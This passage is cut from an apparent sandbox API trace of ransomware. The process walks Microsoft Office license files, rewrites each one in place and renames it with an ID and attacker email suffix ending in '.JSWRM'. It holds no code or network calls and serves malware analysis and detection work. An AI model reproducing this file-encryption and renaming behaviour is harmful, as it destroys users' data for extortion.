(HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0110.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardR_Retail-ul-oob.xrm-ms", cchWideChar=30, lpMultiByteStr=0x241268, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StandardR_Retail-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0110.416] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0110.416] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0110.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardR_Retail-ul-oob.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0110.416] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0110.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardR_Retail-ul-oob.xrm-ms", cchWideChar=30, lpMultiByteStr=0x2410d8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StandardR_Retail-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0110.416] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0110.416] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236ae0 [0110.416] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0110.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0110.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0110.416] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0110.416] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\StandardR_Retail-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\standardr_retail-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0110.417] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11589) returned 1 [0110.417] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.417] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d40) returned 0x24c1d0 [0110.417] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d40, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d40, lpOverlapped=0x0) returned 1 [0110.419] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.419] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d40, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d40, lpOverlapped=0x0) returned 1 [0110.419] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0110.419] CloseHandle (hObject=0x45c) returned 1 [0110.419] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0110.420] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0110.420] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0110.420] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0110.420] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0110.420] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0110.420] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0110.420] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0110.420] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0110.420] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0110.420] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0110.420] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e8b8 [0110.420] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0110.420] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0110.420] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\StandardR_Retail-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\standardr_retail-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\StandardR_Retail-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\standardr_retail-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0110.421] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e8b8 | out: hHeap=0x1e0000) returned 1 [0110.421] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0110.421] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0110.421] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0110.421] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0110.421] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb9e776b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeb9e776b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xebaa62a6, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4dde, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="StandardR_Retail-ul-phn.xrm-ms", cAlternateFileName="ST0C9C~1.XRM")) returned 1 [0110.421] lstrcmpiW (lpString1="StandardR_Retail-ul-phn.xrm-ms", lpString2=".") returned 1 [0110.421] lstrcmpiW (lpString1="StandardR_Retail-ul-phn.xrm-ms", lpString2="..") returned 1 [0110.421] lstrcmpiW (lpString1="StandardR_Retail-ul-phn.xrm-ms", lpString2="...") returned 1 [0110.421] lstrcmpiW (lpString1="StandardR_Retail-ul-phn.xrm-ms", lpString2="windows") returned -1 [0110.421] lstrcmpiW (lpString1="StandardR_Retail-ul-phn.xrm-ms", lpString2="recovery") returned 1 [0110.421] lstrcmpiW (lpString1="StandardR_Retail-ul-phn.xrm-ms", lpString2="perflogs") returned 1 [0110.421] lstrcmpiW (lpString1="StandardR_Retail-ul-phn.xrm-ms", lpString2="documents and settings") returned 1 [0110.421] lstrcmpiW (lpString1="StandardR_Retail-ul-phn.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0110.421] lstrcmpiW (lpString1="StandardR_Retail-ul-phn.xrm-ms", lpString2="system volume information") returned -1 [0110.421] lstrcmpiW (lpString1="StandardR_Retail-ul-phn.xrm-ms", lpString2="msocache") returned 1 [0110.421] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0110.421] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardR_Retail-ul-phn.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0110.421] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0110.421] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardR_Retail-ul-phn.xrm-ms", cchWideChar=30, lpMultiByteStr=0x241308, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StandardR_Retail-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0110.421] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0110.421] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0110.421] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardR_Retail-ul-phn.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0110.421] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0110.422] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardR_Retail-ul-phn.xrm-ms", cchWideChar=30, lpMultiByteStr=0x241010, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StandardR_Retail-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0110.422] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0110.422] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0110.422] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236ae0 | out: hHeap=0x1e0000) returned 1 [0110.422] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0110.422] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0110.422] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0110.422] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\StandardR_Retail-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\standardr_retail-ul-phn.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0110.422] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=19934) returned 1 [0110.422] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.422] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4dd0) returned 0x24c1d0 [0110.422] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x4dd0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x4dd0, lpOverlapped=0x0) returned 1 [0110.425] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.425] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x4dd0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x4dd0, lpOverlapped=0x0) returned 1 [0110.425] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0110.425] CloseHandle (hObject=0x45c) returned 1 [0110.425] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0110.425] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0110.425] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0110.425] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0110.425] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0110.425] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0110.425] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0110.425] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0110.425] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0110.425] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0110.425] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0110.426] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dee0 [0110.426] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0110.426] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0110.426] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\StandardR_Retail-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\standardr_retail-ul-phn.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\StandardR_Retail-ul-phn.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\standardr_retail-ul-phn.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0110.427] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dee0 | out: hHeap=0x1e0000) returned 1 [0110.427] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0110.427] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0110.427] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0110.427] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0110.427] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb928b2b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeb928b2b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeba33b90, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2b8f, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="StandardR_Trial-pl.xrm-ms", cAlternateFileName="ST387F~1.XRM")) returned 1 [0110.427] lstrcmpiW (lpString1="StandardR_Trial-pl.xrm-ms", lpString2=".") returned 1 [0110.427] lstrcmpiW (lpString1="StandardR_Trial-pl.xrm-ms", lpString2="..") returned 1 [0110.427] lstrcmpiW (lpString1="StandardR_Trial-pl.xrm-ms", lpString2="...") returned 1 [0110.427] lstrcmpiW (lpString1="StandardR_Trial-pl.xrm-ms", lpString2="windows") returned -1 [0110.427] lstrcmpiW (lpString1="StandardR_Trial-pl.xrm-ms", lpString2="recovery") returned 1 [0110.427] lstrcmpiW (lpString1="StandardR_Trial-pl.xrm-ms", lpString2="perflogs") returned 1 [0110.427] lstrcmpiW (lpString1="StandardR_Trial-pl.xrm-ms", lpString2="documents and settings") returned 1 [0110.427] lstrcmpiW (lpString1="StandardR_Trial-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0110.427] lstrcmpiW (lpString1="StandardR_Trial-pl.xrm-ms", lpString2="system volume information") returned -1 [0110.427] lstrcmpiW (lpString1="StandardR_Trial-pl.xrm-ms", lpString2="msocache") returned 1 [0110.427] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0110.427] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardR_Trial-pl.xrm-ms", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0110.427] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0110.427] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardR_Trial-pl.xrm-ms", cchWideChar=25, lpMultiByteStr=0x240f48, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StandardR_Trial-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 25 [0110.427] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0110.427] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0110.427] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardR_Trial-pl.xrm-ms", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0110.427] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0110.427] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardR_Trial-pl.xrm-ms", cchWideChar=25, lpMultiByteStr=0x241100, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StandardR_Trial-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 25 [0110.427] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0110.427] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0110.428] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0110.428] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0110.428] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0110.428] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0110.428] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\StandardR_Trial-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\standardr_trial-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0110.428] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11151) returned 1 [0110.428] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.428] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2b80) returned 0x24c1d0 [0110.428] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2b80, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2b80, lpOverlapped=0x0) returned 1 [0110.470] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.470] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2b80, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2b80, lpOverlapped=0x0) returned 1 [0110.470] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0110.470] CloseHandle (hObject=0x45c) returned 1 [0110.470] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0110.470] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0110.470] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0110.470] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0110.470] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0110.470] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0110.471] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0110.471] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0110.471] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0110.471] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0110.471] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0110.471] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e570 [0110.471] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0110.471] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0110.471] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\StandardR_Trial-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\standardr_trial-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\StandardR_Trial-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\standardr_trial-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0110.472] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e570 | out: hHeap=0x1e0000) returned 1 [0110.472] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0110.472] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0110.472] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0110.472] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0110.472] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb8901d2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeb8901d2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeb9e776b, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5871, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="StandardR_Trial-ppd.xrm-ms", cAlternateFileName="STFBD4~1.XRM")) returned 1 [0110.472] lstrcmpiW (lpString1="StandardR_Trial-ppd.xrm-ms", lpString2=".") returned 1 [0110.472] lstrcmpiW (lpString1="StandardR_Trial-ppd.xrm-ms", lpString2="..") returned 1 [0110.472] lstrcmpiW (lpString1="StandardR_Trial-ppd.xrm-ms", lpString2="...") returned 1 [0110.472] lstrcmpiW (lpString1="StandardR_Trial-ppd.xrm-ms", lpString2="windows") returned -1 [0110.472] lstrcmpiW (lpString1="StandardR_Trial-ppd.xrm-ms", lpString2="recovery") returned 1 [0110.472] lstrcmpiW (lpString1="StandardR_Trial-ppd.xrm-ms", lpString2="perflogs") returned 1 [0110.472] lstrcmpiW (lpString1="StandardR_Trial-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0110.473] lstrcmpiW (lpString1="StandardR_Trial-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0110.473] lstrcmpiW (lpString1="StandardR_Trial-ppd.xrm-ms", lpString2="system volume information") returned -1 [0110.473] lstrcmpiW 